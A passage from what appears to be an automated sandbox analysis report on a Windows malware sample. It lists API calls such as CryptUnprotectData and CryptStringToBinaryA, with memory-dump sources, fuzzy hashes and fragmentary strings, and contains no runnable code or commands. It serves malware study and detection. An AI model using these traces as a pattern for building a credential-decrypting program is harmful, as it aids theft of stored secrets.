                                • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 006AEA76
                                • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 006AEA7E
                                • lstrcat.KERNEL32(006CCFEC,006CCFEC), ref: 006AEB27
                                • lstrcat.KERNEL32(006CCFEC,006CCFEC), ref: 006AEB49
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: d9a29e1aac5ab4d12505670d6e92db7df2bce6c18a1040981ef58a9a2439f24a
                                • Instruction ID: 0416e62227cd2023cfe8bda5e4545c729d1cc97300ae4be66bd46195a39955db
                                • Opcode Fuzzy Hash: d9a29e1aac5ab4d12505670d6e92db7df2bce6c18a1040981ef58a9a2439f24a
                                • Instruction Fuzzy Hash: DF31A475A01119ABDB109B98EC49FEEB76AEF44715F04426EFA09E3240DBB15A048BA1
                                APIs
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 006C40CD
                                • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 006C40DC
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C40E3
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 006C4113
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptHeapString$AllocateProcess
                                • String ID:
                                • API String ID: 3825993179-0
                                • Opcode ID: 072ab49df06bbad7a4e5e5c4eeb668168f6171d04675ca445a2f1a0db31d9b7c
                                • Instruction ID: 059eb1bea2a73909e93b69a36a75adafe7fbe4e2498c8acb65afe12a5f6acf45
                                • Opcode Fuzzy Hash: 072ab49df06bbad7a4e5e5c4eeb668168f6171d04675ca445a2f1a0db31d9b7c
                                • Instruction Fuzzy Hash: 1B011A70601205BBDB10DFA5EC99FAABBAEEF85311F108159FE4987340DE719D40CBA4
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,006CA3D0,000000FF), ref: 006C2B8F
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 006C2B96
                                • GetLocalTime.KERNEL32(?,?,00000000,006CA3D0,000000FF), ref: 006C2BA2
                                • wsprintfA.USER32 ref: 006C2BCE
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: f8a9d2336e8bb39fb2220704e550646bbe8a97dafa5d865ed7273b95ffe977f2
                                • Instruction ID: 88670f6b2ae138d86e564cfa61662af29f908d219c80d992726267361b97820e
                                • Opcode Fuzzy Hash: f8a9d2336e8bb39fb2220704e550646bbe8a97dafa5d865ed7273b95ffe977f2
                                • Instruction Fuzzy Hash: 860140B2905528EBCB149BC9ED45FBEB7BCFB4CB11F00021AF645A2280E7785840C7B1
                                APIs
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006A9B3B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 006A9B4A
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006A9B61
                                • LocalFree.KERNEL32 ref: 006A9B70
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: a8dac18e88c80ba822c575a00ba3c2b3c1147888385ddb0504303775c0ee97de
                                • Instruction ID: b72fc28437860453d3401662f4f538eafe0632066bbe2b5716893a3cccc0d11c
                                • Opcode Fuzzy Hash: a8dac18e88c80ba822c575a00ba3c2b3c1147888385ddb0504303775c0ee97de
                                • Instruction Fuzzy Hash: B7F01D703427126BE7305F64AC49F977BA8EF05B50F200115FA49EA2D0D7B49C40CAA4
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 3Y,@$c;z$ht?
                                • API String ID: 0-2531942585
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: P2So$TT_z$iA{
                                • API String ID: 0-1724300118
                                APIs
                                • CoCreateInstance.COMBASE(006CB110,00000000,00000001,006CB100,?), ref: 006BCB06
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 006BCB46
                                • lstrcpyn.KERNEL32(?,?,00000104), ref: 006BCBC9
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 1940255200-0
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 006A9B9F
                                • LocalAlloc.KERNEL32(00000040,?), ref: 006A9BB3
                                • LocalFree.KERNEL32(?), ref: 006A9BD7
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: C<}w$Uq8_
                                • API String ID: 0-956720481
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: S|~$}
                                • API String ID: 0-170503413
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ht}
                                • API String ID: 0-142355101
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9a2833da2788437beac8057a9f0a1bfa213fe603d2d7e70013597479c7691552
                                • Instruction ID: 82da3d3690ae2c5931f6fe6c98c11692533ae6a7e2ed121e1537a23e1862b6b5
                                • Opcode Fuzzy Hash: 9a2833da2788437beac8057a9f0a1bfa213fe603d2d7e70013597479c7691552
                                • Instruction Fuzzy Hash: EF51E1F260C200DFD740AF28DC85BBAB7F5EB94350F26852DE6C5C7B44E23558408687
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7091a56d144c25f228fd733eb780bc9e875c67dcb43dabe7c93cc60c8c106c30
                                • Instruction ID: 859ded773d2f63291c7c68dedd098a0631617cbbcd5be55b8ee5008b2d019288
                                • Opcode Fuzzy Hash: 7091a56d144c25f228fd733eb780bc9e875c67dcb43dabe7c93cc60c8c106c30
                                • Instruction Fuzzy Hash: AA5126F390C240DFD3086E3ADD9467AB7F5EBA4320F398A3EE5C642788E97548019253
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 526c556ecdee006a3db1fc680238052605690e1d2ce3dcd36f0f558d2f60df65
                                • Instruction ID: 26159da00b313f3cd9b4234ba86ad36d6051e830e1e2f8d27ffad29eb85f7c4a
                                • Opcode Fuzzy Hash: 526c556ecdee006a3db1fc680238052605690e1d2ce3dcd36f0f558d2f60df65
                                • Instruction Fuzzy Hash: C341E7F3A086005FF3086E1CEC9577AB6D5EF94310F1A453DDAC993740E93968518686
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd718c09eb89b4234d9c48cb9db7351715aeacdd6be7b69a275ad51e0b275b8b
                                • Instruction ID: 2fc4b272a41bbbaa83641e1fa4d5bcfebdcf6258f081646753f3f117272352a8
                                • Opcode Fuzzy Hash: bd718c09eb89b4234d9c48cb9db7351715aeacdd6be7b69a275ad51e0b275b8b
                                • Instruction Fuzzy Hash: 9041D4F3A082049FE300BA19EC48B6BBBE6DFD4320F16853DD69487784EA7558158697
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 066b4e0457d97a04cdd7c8554ee35bc84951a389b081664b534c8ce55b341e95
                                • Instruction ID: 3451b298fbdfc361b3b3fa1f6e50d1e658fba18bab80bab570ebda1f28b0d70e
                                • Opcode Fuzzy Hash: 066b4e0457d97a04cdd7c8554ee35bc84951a389b081664b534c8ce55b341e95
                                • Instruction Fuzzy Hash: 294115F3B196044BF3085929EC94336B6CBEBD8324F2B823D9A88977C4DC7C580A4295
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 006B8636
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B866D
                                • lstrcpy.KERNEL32(?,00000000), ref: 006B86AA
                                • StrStrA.SHLWAPI(?,0133E998), ref: 006B86CF
                                • lstrcpyn.KERNEL32(008D93D0,?,00000000), ref: 006B86EE
                                • lstrlen.KERNEL32(?), ref: 006B8701
                                • wsprintfA.USER32 ref: 006B8711
                                • lstrcpy.KERNEL32(?,?), ref: 006B8727
                                • StrStrA.SHLWAPI(?,0133E9C8), ref: 006B8754
                                • lstrcpy.KERNEL32(?,008D93D0), ref: 006B87B4
                                • StrStrA.SHLWAPI(?,0133EDD0), ref: 006B87E1
                                • lstrcpyn.KERNEL32(008D93D0,?,00000000), ref: 006B8800
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                • String ID: %s%s
